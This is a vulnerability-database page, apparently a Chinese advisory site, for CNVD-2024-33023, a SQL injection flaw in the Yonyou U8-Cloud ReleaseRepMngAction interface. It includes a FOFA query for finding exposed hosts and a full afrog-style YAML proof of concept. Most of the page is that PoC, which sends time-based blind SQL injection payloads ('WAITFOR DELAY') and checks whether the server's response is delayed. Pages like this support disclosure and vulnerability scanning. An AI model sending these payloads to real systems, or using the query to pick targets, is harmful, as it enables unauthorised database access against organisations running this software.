CNVD-2024-33023: Yonyou U8-Cloud ReleaseRepMngAction SQL Injection

日期: 2025-09-01 | 影响软件: Yonyou U8-Cloud | POC: 已公开

漏洞描述

Yonyou U8-Cloud ReleaseRepMngAction interface has a SQL injection vulnerability (CNVD-2024-33023). The vulnerability allows attackers to execute arbitrary SQL statements through maliciously crafted requests. FOFA: title=="U8C"

PoC代码[已公开]

id: CNVD-2024-33023
info:
  name: Yonyou U8-Cloud ReleaseRepMngAction SQL Injection
  author: ZacharyZcR
  severity: critical
  verified: true
  description: |
    Yonyou U8-Cloud ReleaseRepMngAction interface has a SQL injection vulnerability (CNVD-2024-33023).
    The vulnerability allows attackers to execute arbitrary SQL statements through maliciously crafted requests.
    FOFA: title=="U8C"
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-Cloud%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3ReleaseRepMngAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CNVD-2024-33023).md
  tags: cnvd,cnvd2024,yonyou,sqli
  created: 2024/12/30

rules:
  r0:
    request:
      method: GET
      path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:10%27--
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"iUFO") && 
      response.latency <= 12000 &&  
      response.latency >= 10000
  r1:
    request:
      method: GET
      path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"iUFO") && 
      response.latency <= 8000 &&  
      response.latency >= 6000
  r2:
    request:
      method: GET
      path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:10%27--
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"iUFO") && 
      response.latency <= 12000 &&  
      response.latency >= 10000
  r3:
    request:
      method: GET
      path: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"iUFO") && 
      response.latency <= 8000 &&  
      response.latency >= 6000
expression: r0() && r1() && r2() && r3()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2024/CNVD-2024-33023.yaml

相关漏洞推荐